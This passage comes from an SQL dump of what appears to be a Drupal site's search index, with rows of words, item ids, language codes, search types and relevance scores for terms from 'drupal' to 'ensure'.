('drupal', 79, 'ko', 'help_search', 11),
('drupal', 80, 'en', 'help_search', 9.711),
('drupal', 80, 'ja', 'help_search', 9.711),
('drupal', 80, 'ko', 'help_search', 9.711),
('drupal', 91, 'en', 'help_search', 10.572),
('drupal', 91, 'ja', 'help_search', 10.5295),
('drupal', 91, 'ko', 'help_search', 10.572),
('drupal', 93, 'en', 'help_search', 8.54373),
('drupal', 93, 'ja', 'help_search', 8.54373),
('drupal', 93, 'ko', 'help_search', 8.54373),
('drupalorg', 29, 'en', 'help_search', 22),
('drupalorg', 29, 'ja', 'help_search', 22),
('drupalorg', 29, 'ko', 'help_search', 22),
('drupalorg', 33, 'en', 'help_search', 11),
('drupalorg', 33, 'ja', 'help_search', 11),
('drupalorg', 33, 'ko', 'help_search', 11),
('drush', 30, 'en', 'help_search', 7.43636),
('drush', 30, 'ja', 'help_search', 7.43636),
('drush', 30, 'ko', 'help_search', 7.43636),
('dsfsdfsd', 206, 'ja', 'node_search', 1),
('dubai', 18, 'en', 'node_search', 28),
('dubai', 18, 'ko', 'node_search', 28),
('dubai', 23, 'en', 'node_search', 0.892724),
('dubai', 24, 'en', 'node_search', 0.892724),
('due', 72, 'en', 'help_search', 1),
('due', 72, 'ja', 'help_search', 1),
('due', 72, 'ko', 'help_search', 1),
('dummy', 204, 'en', 'node_search', 4),
('dummy', 204, 'ja', 'node_search', 4),
('duration', 66, 'en', 'node_search', 2),
('duration', 155, 'en', 'node_search', 1),
('during', 55, 'en', 'help_search', 1),
('during', 55, 'ja', 'help_search', 1),
('during', 55, 'ko', 'help_search', 1),
('during', 67, 'en', 'help_search', 1),
('during', 67, 'ja', 'help_search', 1),
('during', 67, 'ko', 'help_search', 1),
('during', 189, 'en', 'node_search', 1),
('dynamic', 37, 'en', 'help_search', 10.2101),
('dynamic', 37, 'ja', 'help_search', 10.2101),
('dynamic', 37, 'ko', 'help_search', 10.2101),
('e71', 7, 'en', 'node_search', 2),
('e71', 7, 'ja', 'node_search', 1.8861),
('e71', 7, 'ko', 'node_search', 4),
('e72', 7, 'en', 'node_search', 2),
('e72', 7, 'ja', 'node_search', 1.8861),
('e72', 7, 'ko', 'node_search', 4),
('e73', 6, 'en', 'node_search', 28),
('e73', 6, 'ja', 'node_search', 28),
('e73', 6, 'ko', 'node_search', 29),
('e73', 7, 'en', 'node_search', 2),
('e73', 7, 'ja', 'node_search', 1.8861),
('e73', 7, 'ko', 'node_search', 4),
('e73', 24, 'ko', 'node_search', 1),
('e73', 31, 'en', 'node_search', 0.920273),
('e74', 7, 'en', 'node_search', 2),
('e74', 7, 'ja', 'node_search', 1.87103),
('e74', 7, 'ko', 'node_search', 4),
('each', 2, 'en', 'help_search', 2),
('each', 2, 'ja', 'help_search', 2),
('each', 2, 'ko', 'help_search', 2),
('each', 6, 'en', 'help_search', 1),
('each', 6, 'ja', 'help_search', 1),
('each', 6, 'ko', 'help_search', 1),
('each', 7, 'en', 'help_search', 0.942091),
('each', 7, 'ja', 'help_search', 0.942091),
('each', 7, 'ko', 'help_search', 0.942091),
('each', 11, 'en', 'help_search', 2),
('each', 11, 'ja', 'help_search', 2),
('each', 11, 'ko', 'help_search', 2),
('each', 20, 'en', 'help_search', 1),
('each', 20, 'ja', 'help_search', 1),
('each', 20, 'ko', 'help_search', 1),
('each', 23, 'en', 'help_search', 1),
('each', 23, 'ja', 'help_search', 1),
('each', 23, 'ko', 'help_search', 1),
('each', 25, 'en', 'help_search', 3),
('each', 25, 'ja', 'help_search', 3),
('each', 26, 'en', 'help_search', 2),
('each', 26, 'ja', 'help_search', 2),
('each', 26, 'ko', 'help_search', 2),
('each', 28, 'en', 'help_search', 1.79212),
('each', 28, 'ja', 'help_search', 1.79212),
('each', 28, 'ko', 'help_search', 1.79212),
('each', 30, 'en', 'help_search', 2.89272),
('each', 30, 'ja', 'help_search', 2.89272),
('each', 30, 'ko', 'help_search', 2.89272),
('each', 31, 'ja', 'help_search', 1.74762),
('each', 36, 'en', 'help_search', 1),
('each', 36, 'ja', 'help_search', 1),
('each', 36, 'ko', 'help_search', 1),
('each', 46, 'en', 'help_search', 1),
('each', 46, 'ja', 'help_search', 1),
('each', 46, 'ko', 'help_search', 1),
('each', 47, 'en', 'help_search', 3),
('each', 47, 'ja', 'help_search', 3),
('each', 47, 'ko', 'help_search', 3),
('each', 50, 'en', 'help_search', 0.976851),
('each', 50, 'ja', 'help_search', 0.976851),
('each', 50, 'ko', 'help_search', 0.976851),
('each', 53, 'en', 'help_search', 1),
('each', 53, 'ja', 'help_search', 1),
('each', 53, 'ko', 'help_search', 1),
('each', 54, 'en', 'help_search', 1),
('each', 54, 'ja', 'help_search', 1),
('each', 54, 'ko', 'help_search', 1),
('each', 59, 'en', 'help_search', 1),
('each', 59, 'ja', 'help_search', 1),
('each', 59, 'ko', 'help_search', 1),
('each', 61, 'en', 'help_search', 1),
('each', 61, 'ja', 'help_search', 1),
('each', 61, 'ko', 'help_search', 1),
('each', 62, 'en', 'help_search', 3),
('each', 62, 'ja', 'help_search', 3),
('each', 62, 'ko', 'help_search', 3),
('each', 67, 'en', 'help_search', 0.879565),
('each', 67, 'ja', 'help_search', 0.879565),
('each', 67, 'ko', 'help_search', 0.879565),
('each', 68, 'en', 'help_search', 2),
('each', 68, 'ja', 'help_search', 2),
('each', 68, 'ko', 'help_search', 2),
('each', 69, 'en', 'help_search', 1),
('each', 69, 'ja', 'help_search', 1),
('each', 69, 'ko', 'help_search', 1),
('each', 72, 'en', 'help_search', 1),
('each', 72, 'ja', 'help_search', 1),
('each', 72, 'ko', 'help_search', 1),
('each', 77, 'en', 'help_search', 1),
('each', 77, 'ja', 'help_search', 1),
('each', 77, 'ko', 'help_search', 1),
('each', 80, 'en', 'help_search', 2.93781),
('each', 80, 'ja', 'help_search', 2.93781),
('each', 80, 'ko', 'help_search', 2.93781),
('each', 81, 'en', 'help_search', 1),
('each', 81, 'ja', 'help_search', 1),
('each', 81, 'ko', 'help_search', 1),
('each', 84, 'en', 'help_search', 1),
('each', 84, 'ja', 'help_search', 1),
('each', 84, 'ko', 'help_search', 1),
('each', 89, 'en', 'help_search', 1),
('each', 89, 'ja', 'help_search', 1),
('each', 89, 'ko', 'help_search', 1),
('each', 91, 'en', 'help_search', 1),
('each', 91, 'ja', 'help_search', 1),
('each', 91, 'ko', 'help_search', 1),
('each', 92, 'en', 'help_search', 5),
('each', 92, 'ja', 'help_search', 5),
('each', 92, 'ko', 'help_search', 5),
('each', 93, 'en', 'help_search', 2),
('each', 93, 'ja', 'help_search', 2),
('each', 93, 'ko', 'help_search', 2),
('each', 142, 'en', 'node_search', 1),
('each', 196, 'en', 'node_search', 1),
('eager', 66, 'en', 'node_search', 1),
('eaindar', 197, 'en', 'node_search', 6),
('eaindar', 197, 'ja', 'node_search', 4.07688),
('eaindra', 117, 'en', 'node_search', 31),
('eaindra', 117, 'ja', 'node_search', 31),
('eaindra', 177, 'en', 'node_search', 2),
('eaindra', 177, 'ja', 'node_search', 1.71423),
('eaindray', 157, 'en', 'node_search', 1),
('eaindray', 157, 'ja', 'node_search', 1),
('early', 87, 'en', 'node_search', 1),
('earn', 62, 'en', 'node_search', 1),
('earned', 8, 'en', 'node_search', 2),
('earned', 31, 'en', 'node_search', 1),
('earned', 187, 'en', 'node_search', 1),
('earned', 188, 'en', 'node_search', 1),
('earned', 190, 'en', 'node_search', 1),
('earned', 197, 'en', 'node_search', 1),
('easier', 23, 'en', 'help_search', 1),
('easier', 23, 'ja', 'help_search', 1),
('easier', 23, 'ko', 'help_search', 1),
('easier', 27, 'en', 'help_search', 1),
('easier', 27, 'ja', 'help_search', 1),
('easier', 27, 'ko', 'help_search', 1),
('easier', 42, 'en', 'help_search', 2),
('easier', 42, 'ja', 'help_search', 2),
('easier', 42, 'ko', 'help_search', 2),
('easy', 68, 'en', 'help_search', 0.800068),
('easy', 68, 'ja', 'help_search', 0.800068),
('easy', 68, 'ko', 'help_search', 0.800068),
('economy', 23, 'en', 'node_search', 1),
('edit', 1, 'en', 'help_search', 1),
('edit', 1, 'ja', 'help_search', 1),
('edit', 1, 'ko', 'help_search', 1),
('edit', 2, 'en', 'help_search', 1),
('edit', 2, 'ja', 'help_search', 1),
('edit', 2, 'ko', 'help_search', 1),
('edit', 5, 'en', 'help_search', 1),
('edit', 5, 'ja', 'help_search', 1),
('edit', 5, 'ko', 'help_search', 1),
('edit', 9, 'en', 'help_search', 7),
('edit', 9, 'ja', 'help_search', 7),
('edit', 9, 'ko', 'help_search', 7),
('edit', 10, 'en', 'help_search', 4),
('edit', 10, 'ja', 'help_search', 4),
('edit', 10, 'ko', 'help_search', 4),
('edit', 21, 'en', 'help_search', 4),
('edit', 21, 'ja', 'help_search', 4),
('edit', 21, 'ko', 'help_search', 4),
('edit', 22, 'en', 'help_search', 1),
('edit', 22, 'ja', 'help_search', 1),
('edit', 22, 'ko', 'help_search', 1),
('edit', 24, 'en', 'help_search', 2),
('edit', 24, 'ja', 'help_search', 2),
('edit', 24, 'ko', 'help_search', 2),
('edit', 26, 'en', 'help_search', 27),
('edit', 26, 'ja', 'help_search', 27),
('edit', 26, 'ko', 'help_search', 27),
('edit', 27, 'en', 'help_search', 1),
('edit', 27, 'ja', 'help_search', 1),
('edit', 27, 'ko', 'help_search', 1),
('edit', 31, 'ja', 'help_search', 1.59803),
('edit', 39, 'en', 'help_search', 39),
('edit', 39, 'ja', 'help_search', 39),
('edit', 39, 'ko', 'help_search', 39),
('edit', 43, 'en', 'help_search', 0.993146),
('edit', 43, 'ja', 'help_search', 0.993146),
('edit', 43, 'ko', 'help_search', 0.993146),
('edit', 54, 'en', 'help_search', 4),
('edit', 54, 'ja', 'help_search', 4),
('edit', 54, 'ko', 'help_search', 4),
('edit', 55, 'en', 'help_search', 4),
('edit', 55, 'ja', 'help_search', 4),
('edit', 55, 'ko', 'help_search', 4),
('edit', 56, 'en', 'help_search', 5),
('edit', 56, 'ja', 'help_search', 5),
('edit', 56, 'ko', 'help_search', 5),
('edit', 57, 'en', 'help_search', 1),
('edit', 57, 'ja', 'help_search', 1),
('edit', 57, 'ko', 'help_search', 1),
('edit', 58, 'en', 'help_search', 5),
('edit', 58, 'ja', 'help_search', 5),
('edit', 58, 'ko', 'help_search', 5),
('edit', 59, 'en', 'help_search', 2),
('edit', 59, 'ja', 'help_search', 2),
('edit', 59, 'ko', 'help_search', 2),
('edit', 60, 'en', 'help_search', 1),
('edit', 60, 'ja', 'help_search', 1),
('edit', 60, 'ko', 'help_search', 1),
('edit', 61, 'en', 'help_search', 38),
('edit', 61, 'ja', 'help_search', 38),
('edit', 61, 'ko', 'help_search', 38),
('edit', 62, 'en', 'help_search', 2),
('edit', 62, 'ja', 'help_search', 2),
('edit', 62, 'ko', 'help_search', 2),
('edit', 63, 'en', 'help_search', 7),
('edit', 63, 'ja', 'help_search', 7),
('edit', 63, 'ko', 'help_search', 7),
('edit', 64, 'en', 'help_search', 5),
('edit', 64, 'ja', 'help_search', 5),
('edit', 64, 'ko', 'help_search', 5),
('edit', 66, 'en', 'help_search', 4),
('edit', 66, 'ja', 'help_search', 4),
('edit', 69, 'en', 'help_search', 12.9397),
('edit', 69, 'ja', 'help_search', 12.9397),
('edit', 69, 'ko', 'help_search', 12.9397),
('edit', 71, 'en', 'help_search', 5),
('edit', 71, 'ja', 'help_search', 5),
('edit', 71, 'ko', 'help_search', 5),
('edit', 80, 'en', 'help_search', 0.938382),
('edit', 80, 'ja', 'help_search', 0.938382),
('edit', 80, 'ko', 'help_search', 0.938382),
('edit', 81, 'en', 'help_search', 1),
('edit', 81, 'ja', 'help_search', 1),
('edit', 81, 'ko', 'help_search', 1),
('edit', 83, 'en', 'help_search', 4),
('edit', 83, 'ja', 'help_search', 4),
('edit', 83, 'ko', 'help_search', 4),
('edit', 86, 'en', 'help_search', 1.98493),
('edit', 86, 'ja', 'help_search', 1.98493),
('edit', 86, 'ko', 'help_search', 1.98493),
('edit', 87, 'en', 'help_search', 4),
('edit', 87, 'ja', 'help_search', 4),
('edit', 87, 'ko', 'help_search', 4),
('edit', 88, 'en', 'help_search', 6),
('edit', 88, 'ja', 'help_search', 6),
('edit', 88, 'ko', 'help_search', 6),
('edit', 89, 'en', 'help_search', 26),
('edit', 89, 'ja', 'help_search', 26),
('edit', 89, 'ko', 'help_search', 26),
('edit', 90, 'en', 'help_search', 5),
('edit', 90, 'ja', 'help_search', 5),
('edit', 90, 'ko', 'help_search', 5),
('edit', 91, 'en', 'help_search', 7),
('edit', 91, 'ja', 'help_search', 7),
('edit', 91, 'ko', 'help_search', 7),
('edit', 92, 'en', 'help_search', 4),
('edit', 92, 'ja', 'help_search', 4),
('edit', 92, 'ko', 'help_search', 4),
('edit', 93, 'en', 'help_search', 1.7974),
('edit', 93, 'ja', 'help_search', 1.7974),
('edit', 93, 'ko', 'help_search', 1.7974),
('editing', 5, 'en', 'help_search', 1),
('editing', 5, 'ja', 'help_search', 1),
('editing', 5, 'ko', 'help_search', 1),
('editing', 8, 'en', 'help_search', 1),
('editing', 8, 'ja', 'help_search', 1),
('editing', 8, 'ko', 'help_search', 1),
('editing', 22, 'en', 'help_search', 1),
('editing', 22, 'ja', 'help_search', 1),
('editing', 22, 'ko', 'help_search', 1),
('editing', 23, 'en', 'help_search', 2),
('editing', 23, 'ja', 'help_search', 2),
('editing', 23, 'ko', 'help_search', 2),
('editing', 24, 'en', 'help_search', 3),
('editing', 24, 'ja', 'help_search', 3),
('editing', 24, 'ko', 'help_search', 3),
('editing', 26, 'en', 'help_search', 5),
('editing', 26, 'ja', 'help_search', 5),
('editing', 26, 'ko', 'help_search', 5),
('editing', 27, 'en', 'help_search', 3),
('editing', 27, 'ja', 'help_search', 3),
('editing', 27, 'ko', 'help_search', 3),
('editing', 28, 'en', 'help_search', 1),
('editing', 28, 'ja', 'help_search', 1),
('editing', 28, 'ko', 'help_search', 1),
('editing', 35, 'en', 'help_search', 1),
('editing', 35, 'ja', 'help_search', 1),
('editing', 35, 'ko', 'help_search', 1),
('editing', 36, 'en', 'help_search', 1),
('editing', 36, 'ja', 'help_search', 1),
('editing', 36, 'ko', 'help_search', 1),
('editing', 39, 'en', 'help_search', 46),
('editing', 39, 'ja', 'help_search', 46),
('editing', 39, 'ko', 'help_search', 46),
('editing', 43, 'en', 'help_search', 3),
('editing', 43, 'ja', 'help_search', 3),
('editing', 43, 'ko', 'help_search', 3),
('editing', 47, 'en', 'help_search', 1),
('editing', 47, 'ja', 'help_search', 1),
('editing', 47, 'ko', 'help_search', 1),
('editing', 55, 'en', 'help_search', 3),
('editing', 55, 'ja', 'help_search', 3),
('editing', 55, 'ko', 'help_search', 3),
('editing', 57, 'en', 'help_search', 1),
('editing', 57, 'ja', 'help_search', 1),
('editing', 57, 'ko', 'help_search', 1),
('editing', 60, 'en', 'help_search', 1),
('editing', 60, 'ja', 'help_search', 1),
('editing', 60, 'ko', 'help_search', 1),
('editing', 61, 'en', 'help_search', 37.363),
('editing', 61, 'ja', 'help_search', 37.363),
('editing', 61, 'ko', 'help_search', 37.363),
('editing', 63, 'en', 'help_search', 1),
('editing', 63, 'ja', 'help_search', 1),
('editing', 63, 'ko', 'help_search', 1),
('editing', 64, 'en', 'help_search', 26),
('editing', 64, 'ja', 'help_search', 26),
('editing', 64, 'ko', 'help_search', 26),
('editing', 69, 'en', 'help_search', 1),
('editing', 69, 'ja', 'help_search', 1),
('editing', 69, 'ko', 'help_search', 1),
('editing', 80, 'en', 'help_search', 3.91674),
('editing', 80, 'ja', 'help_search', 3.91674),
('editing', 80, 'ko', 'help_search', 3.91674),
('editing', 84, 'en', 'help_search', 1),
('editing', 84, 'ja', 'help_search', 1),
('editing', 84, 'ko', 'help_search', 1),
('editing', 88, 'en', 'help_search', 3),
('editing', 88, 'ja', 'help_search', 3),
('editing', 88, 'ko', 'help_search', 3),
('editing', 91, 'en', 'help_search', 28),
('editing', 91, 'ja', 'help_search', 28),
('editing', 91, 'ko', 'help_search', 28),
('editing', 92, 'en', 'help_search', 1),
('editing', 92, 'ja', 'help_search', 1),
('editing', 92, 'ko', 'help_search', 1),
('editor', 13, 'en', 'help_search', 1),
('editor', 13, 'ja', 'help_search', 1),
('editor', 13, 'ko', 'help_search', 1),
('editor', 23, 'en', 'help_search', 35.8406),
('editor', 23, 'ja', 'help_search', 35.8406),
('editor', 23, 'ko', 'help_search', 35.8406),
('editor', 28, 'en', 'help_search', 3.65618),
('editor', 28, 'ja', 'help_search', 3.65618),
('editor', 28, 'ko', 'help_search', 3.65618),
('editors', 23, 'en', 'help_search', 35.9809),
('editors', 23, 'ja', 'help_search', 35.9809),
('editors', 23, 'ko', 'help_search', 35.9809),
('editors', 27, 'en', 'help_search', 1),
('editors', 27, 'ja', 'help_search', 1),
('editors', 27, 'ko', 'help_search', 1),
('editors', 28, 'en', 'help_search', 7.96127),
('editors', 28, 'ja', 'help_search', 7.96127),
('editors', 28, 'ko', 'help_search', 7.96127),
('edits', 39, 'en', 'help_search', 1),
('edits', 39, 'ja', 'help_search', 1),
('edits', 39, 'ko', 'help_search', 1),
('edits', 61, 'en', 'help_search', 1),
('edits', 61, 'ja', 'help_search', 1),
('edits', 61, 'ko', 'help_search', 1),
('education', 27, 'en', 'node_search', 1.49773),
('education', 135, 'en', 'node_search', 1),
('education', 181, 'en', 'node_search', 1),
('education', 182, 'en', 'node_search', 1),
('education', 183, 'en', 'node_search', 1),
('educational', 5, 'en', 'node_search', 1),
('educational', 5, 'ko', 'node_search', 1),
('educational', 27, 'en', 'node_search', 0.854391),
('effect', 48, 'en', 'help_search', 11),
('effect', 48, 'ja', 'help_search', 11),
('effect', 48, 'ko', 'help_search', 11),
('effectively', 28, 'en', 'node_search', 1),
('effects', 35, 'en', 'help_search', 5),
('effects', 35, 'ja', 'help_search', 5),
('effects', 35, 'ko', 'help_search', 5),
('effects', 48, 'en', 'help_search', 3),
('effects', 48, 'ja', 'help_search', 3),
('effects', 48, 'ko', 'help_search', 3),
('efficiently', 67, 'en', 'help_search', 1),
('efficiently', 67, 'ja', 'help_search', 1),
('efficiently', 67, 'ko', 'help_search', 1),
('effort', 179, 'en', 'node_search', 1),
('effort', 183, 'en', 'node_search', 1),
('effort', 184, 'en', 'node_search', 1),
('effort', 191, 'en', 'node_search', 1),
('effort', 196, 'en', 'node_search', 1),
('effort', 199, 'en', 'node_search', 28),
('efforts', 192, 'en', 'node_search', 1),
('eight', 69, 'en', 'node_search', 1),
('eight', 126, 'en', 'node_search', 1),
('either', 16, 'en', 'help_search', 1),
('either', 16, 'ja', 'help_search', 1),
('either', 16, 'ko', 'help_search', 1),
('either', 22, 'en', 'help_search', 1),
('either', 22, 'ja', 'help_search', 1),
('either', 22, 'ko', 'help_search', 1),
('either', 28, 'en', 'help_search', 1.86995),
('either', 28, 'ja', 'help_search', 1.86995),
('either', 28, 'ko', 'help_search', 1.86995),
('either', 30, 'en', 'help_search', 0.733888),
('either', 30, 'ja', 'help_search', 0.733888),
('either', 30, 'ko', 'help_search', 0.733888),
('either', 39, 'en', 'help_search', 1),
('either', 39, 'ja', 'help_search', 1),
('either', 39, 'ko', 'help_search', 1),
('either', 50, 'en', 'help_search', 1),
('either', 50, 'ja', 'help_search', 1),
('either', 50, 'ko', 'help_search', 1),
('either', 69, 'en', 'help_search', 1),
('either', 69, 'ja', 'help_search', 1),
('either', 69, 'ko', 'help_search', 1),
('either', 78, 'en', 'help_search', 1),
('either', 78, 'ja', 'help_search', 1),
('either', 78, 'ko', 'help_search', 1),
('either', 81, 'en', 'help_search', 1),
('either', 81, 'ja', 'help_search', 1),
('either', 81, 'ko', 'help_search', 1),
('either', 92, 'en', 'help_search', 1),
('either', 92, 'ja', 'help_search', 1),
('either', 92, 'ko', 'help_search', 1),
('elderly', 24, 'en', 'node_search', 1.66097),
('elderly', 24, 'ko', 'node_search', 0.740689),
('elderly', 136, 'en', 'node_search', 1),
('elderly', 162, 'en', 'node_search', 1),
('elderly', 188, 'en', 'node_search', 1),
('ele', 204, 'en', 'node_search', 4),
('ele', 204, 'ja', 'node_search', 4),
('electrical', 10, 'en', 'node_search', 45),
('electrical', 10, 'ko', 'node_search', 45),
('electronic', 10, 'en', 'node_search', 1),
('electronic', 10, 'ko', 'node_search', 1),
('element', 89, 'en', 'help_search', 1),
('element', 89, 'ja', 'help_search', 1),
('element', 89, 'ko', 'help_search', 1),
('elements', 81, 'en', 'help_search', 1),
('elements', 81, 'ja', 'help_search', 1),
('elements', 81, 'ko', 'help_search', 1),
('eliminates', 142, 'en', 'node_search', 1),
('eliminating', 136, 'en', 'node_search', 1),
('else', 61, 'en', 'help_search', 1),
('else', 61, 'ja', 'help_search', 1),
('else', 61, 'ko', 'help_search', 1),
('email', 11, 'en', 'node_search', 1),
('email', 11, 'ja', 'node_search', 1),
('email', 20, 'en', 'help_search', 2),
('email', 20, 'ja', 'help_search', 2),
('email', 20, 'ko', 'help_search', 2),
('email', 62, 'en', 'node_search', 0.779231),
('email', 62, 'ja', 'node_search', 0.468115),
('email', 71, 'en', 'help_search', 2),
('email', 71, 'ja', 'help_search', 2),
('email', 71, 'ko', 'help_search', 2),
('email', 82, 'en', 'help_search', 5),
('email', 82, 'ja', 'help_search', 5),
('email', 82, 'ko', 'help_search', 5),
('email', 86, 'en', 'help_search', 24.9849),
('email', 86, 'ja', 'help_search', 24.9849),
('email', 86, 'ko', 'help_search', 24.9849),
('email', 87, 'en', 'help_search', 1),
('email', 87, 'ja', 'help_search', 1),
('email', 87, 'ko', 'help_search', 1),
('embark', 66, 'en', 'node_search', 1.92027),
('embark', 140, 'en', 'node_search', 1),
('embarked', 80, 'en', 'node_search', 4),
('embarking', 169, 'en', 'node_search', 4),
('embarks', 164, 'en', 'node_search', 1),
('embed', 28, 'en', 'help_search', 0.899454),
('embed', 28, 'ja', 'help_search', 0.899454),
('embed', 28, 'ko', 'help_search', 0.899454),
('embrace', 62, 'en', 'node_search', 0.845322),
('embrace', 173, 'en', 'node_search', 1),
('embrace', 186, 'en', 'node_search', 1),
('emphasizing', 27, 'en', 'node_search', 0.752312),
('employ', 23, 'en', 'node_search', 1),
('employed', 6, 'en', 'node_search', 28),
('employees', 23, 'en', 'node_search', 2),
('employees', 26, 'en', 'node_search', 1),
('employers', 26, 'en', 'node_search', 1),
('employment', 23, 'en', 'node_search', 2),
('employment', 23, 'ko', 'node_search', 1),
('employment', 24, 'en', 'node_search', 1.87634),
('employment', 25, 'en', 'node_search', 1),
('employment', 26, 'en', 'node_search', 1),
('employment', 27, 'en', 'node_search', 0.645209),
('employment', 154, 'en', 'node_search', 2),
('employment', 160, 'en', 'node_search', 1),
('employment', 161, 'en', 'node_search', 1),
('employment', 162, 'en', 'node_search', 1),
('employment', 163, 'en', 'node_search', 1),
('employment', 164, 'en', 'node_search', 1),
('employment', 167, 'en', 'node_search', 1),
('employment', 170, 'en', 'node_search', 1),
('employment', 178, 'en', 'node_search', 1),
('employment', 179, 'en', 'node_search', 2),
('employment', 180, 'en', 'node_search', 1),
('employment', 181, 'en', 'node_search', 1),
('employment', 183, 'en', 'node_search', 1),
('employment', 184, 'en', 'node_search', 1),
('employment', 185, 'en', 'node_search', 1),
('employment', 186, 'en', 'node_search', 1),
('employment', 187, 'en', 'node_search', 2),
('employment', 189, 'en', 'node_search', 1),
('employment', 191, 'en', 'node_search', 1),
('employment', 192, 'en', 'node_search', 1),
('employment', 194, 'en', 'node_search', 1),
('employment', 195, 'en', 'node_search', 1),
('employment', 197, 'en', 'node_search', 1),
('employment', 199, 'en', 'node_search', 1),
('empowers', 62, 'en', 'node_search', 1),
('enable', 18, 'en', 'help_search', 1),
('enable', 18, 'ja', 'help_search', 1),
('enable', 18, 'ko', 'help_search', 1),
('enable', 43, 'en', 'help_search', 1),
('enable', 43, 'ja', 'help_search', 1),
('enable', 43, 'ko', 'help_search', 1),
('enable', 46, 'en', 'help_search', 1),
('enable', 46, 'ja', 'help_search', 1),
('enable', 46, 'ko', 'help_search', 1),
('enable', 50, 'en', 'help_search', 1),
('enable', 50, 'ja', 'help_search', 1),
('enable', 50, 'ko', 'help_search', 1),
('enable', 58, 'en', 'help_search', 1),
('enable', 58, 'ja', 'help_search', 1),
('enable', 58, 'ko', 'help_search', 1),
('enabled', 20, 'en', 'help_search', 1),
('enabled', 20, 'ja', 'help_search', 1),
('enabled', 20, 'ko', 'help_search', 1),
('enabled', 28, 'en', 'help_search', 4.36937),
('enabled', 28, 'ja', 'help_search', 4.36937),
('enabled', 28, 'ko', 'help_search', 4.36937),
('enabled', 46, 'en', 'help_search', 1),
('enabled', 46, 'ja', 'help_search', 1),
('enabled', 46, 'ko', 'help_search', 1),
('enabled', 50, 'en', 'help_search', 0.972861),
('enabled', 50, 'ja', 'help_search', 0.972861),
('enabled', 50, 'ko', 'help_search', 0.972861),
('enabled', 56, 'en', 'help_search', 4),
('enabled', 56, 'ja', 'help_search', 4),
('enabled', 56, 'ko', 'help_search', 4),
('enabled', 58, 'en', 'help_search', 4),
('enabled', 58, 'ja', 'help_search', 4),
('enabled', 58, 'ko', 'help_search', 4),
('enabled', 81, 'en', 'help_search', 1),
('enabled', 81, 'ja', 'help_search', 1),
('enabled', 81, 'ko', 'help_search', 1),
('enables', 18, 'en', 'help_search', 2),
('enables', 18, 'ja', 'help_search', 2),
('enables', 18, 'ko', 'help_search', 2),
('enabling', 42, 'en', 'help_search', 1),
('enabling', 42, 'ja', 'help_search', 1),
('enabling', 42, 'ko', 'help_search', 1),
('enabling', 44, 'en', 'help_search', 26),
('enabling', 44, 'ja', 'help_search', 26),
('enabling', 44, 'ko', 'help_search', 26),
('enabling', 73, 'en', 'help_search', 26),
('enabling', 73, 'ja', 'help_search', 26),
('enabling', 73, 'ko', 'help_search', 26),
('enabling', 75, 'en', 'help_search', 1),
('enabling', 75, 'ja', 'help_search', 1),
('enabling', 75, 'ko', 'help_search', 1),
('enclosed', 86, 'en', 'help_search', 1),
('enclosed', 86, 'ja', 'help_search', 1),
('enclosed', 86, 'ko', 'help_search', 1),
('encode', 6, 'en', 'help_search', 1),
('encode', 6, 'ja', 'help_search', 1),
('encode', 6, 'ko', 'help_search', 1),
('encounter', 138, 'en', 'node_search', 1),
('encountering', 136, 'en', 'node_search', 1),
('encourage', 140, 'en', 'node_search', 1),
('encourage', 183, 'en', 'node_search', 1),
('encouraged', 162, 'en', 'node_search', 0.869951),
('encouragement', 120, 'en', 'node_search', 4),
('encourages', 133, 'en', 'node_search', 1),
('end', 22, 'en', 'help_search', 2),
('end', 22, 'ja', 'help_search', 2),
('end', 22, 'ko', 'help_search', 2),
('end', 37, 'en', 'help_search', 1),
('end', 37, 'ja', 'help_search', 1),
('end', 37, 'ko', 'help_search', 1),
('end', 50, 'en', 'help_search', 1),
('end', 50, 'ja', 'help_search', 1),
('end', 50, 'ko', 'help_search', 1),
('end', 69, 'en', 'help_search', 1.95373),
('end', 69, 'ja', 'help_search', 1.95373),
('end', 69, 'ko', 'help_search', 1.95373),
('end', 81, 'en', 'help_search', 7),
('end', 81, 'ja', 'help_search', 7),
('end', 81, 'ko', 'help_search', 7),
('endeavors', 126, 'en', 'node_search', 1),
('endeavors', 150, 'en', 'node_search', 1),
('endeavors', 181, 'en', 'node_search', 1),
('endeavors', 183, 'en', 'node_search', 1),
('enforces', 23, 'en', 'help_search', 1),
('enforces', 23, 'ja', 'help_search', 1),
('enforces', 23, 'ko', 'help_search', 1),
('enforcing', 28, 'en', 'help_search', 1),
('enforcing', 28, 'ja', 'help_search', 1),
('enforcing', 28, 'ko', 'help_search', 1),
('engage', 135, 'en', 'node_search', 1),
('engaged', 142, 'en', 'node_search', 1),
('engaged', 150, 'en', 'node_search', 1),
('engineer', 10, 'en', 'node_search', 44),
('engineer', 10, 'ko', 'node_search', 44),
('engineering', 10, 'en', 'node_search', 2),
('engineering', 10, 'ko', 'node_search', 2),
('engineering', 24, 'en', 'node_search', 1),
('engineers', 10, 'en', 'node_search', 28),
('engineers', 10, 'ko', 'node_search', 28),
('engineers', 27, 'en', 'node_search', 0.98493),
('engines', 25, 'ja', 'help_search', 1),
('english', 5, 'en', 'node_search', 1),
('english', 5, 'ko', 'node_search', 1),
('english', 18, 'en', 'node_search', 1),
('english', 18, 'ko', 'node_search', 1),
('english', 24, 'en', 'node_search', 1.86995),
('english', 30, 'en', 'node_search', 2),
('english', 41, 'en', 'help_search', 3),
('english', 41, 'ja', 'help_search', 3),
('english', 41, 'ko', 'help_search', 3),
('english', 52, 'en', 'help_search', 1),
('english', 52, 'ja', 'help_search', 1),
('english', 52, 'ko', 'help_search', 1),
('english', 68, 'en', 'help_search', 0.972861),
('english', 68, 'ja', 'help_search', 0.972861),
('english', 68, 'ko', 'help_search', 0.972861),
('enhance', 66, 'en', 'node_search', 0.980874),
('enhances', 43, 'en', 'help_search', 1),
('enhances', 43, 'ja', 'help_search', 1),
('enhances', 43, 'ko', 'help_search', 1),
('enjoy', 154, 'en', 'node_search', 1),
('enjoy', 169, 'en', 'node_search', 1),
('enough', 5, 'en', 'node_search', 1),
('enough', 5, 'ko', 'node_search', 1),
('enough', 87, 'en', 'node_search', 2),
('enough', 98, 'en', 'node_search', 1),
('enroll', 62, 'en', 'node_search', 29.8249),
('enroll', 66, 'en', 'node_search', 4),
('enrolled', 66, 'en', 'node_search', 1),
('enrollment', 66, 'en', 'node_search', 0.945829),
('ensure', 26, 'en', 'node_search', 1),
('ensure', 28, 'en', 'help_search', 0.889397),
('ensure', 28, 'ja', 'help_search', 0.889397),
('ensure', 28, 'ko', 'help_search', 0.889397),
('ensure', 32, 'en', 'help_search', 1),
('ensure', 32, 'ja', 'help_search', 1),
('ensure', 32, 'ko', 'help_search', 1),
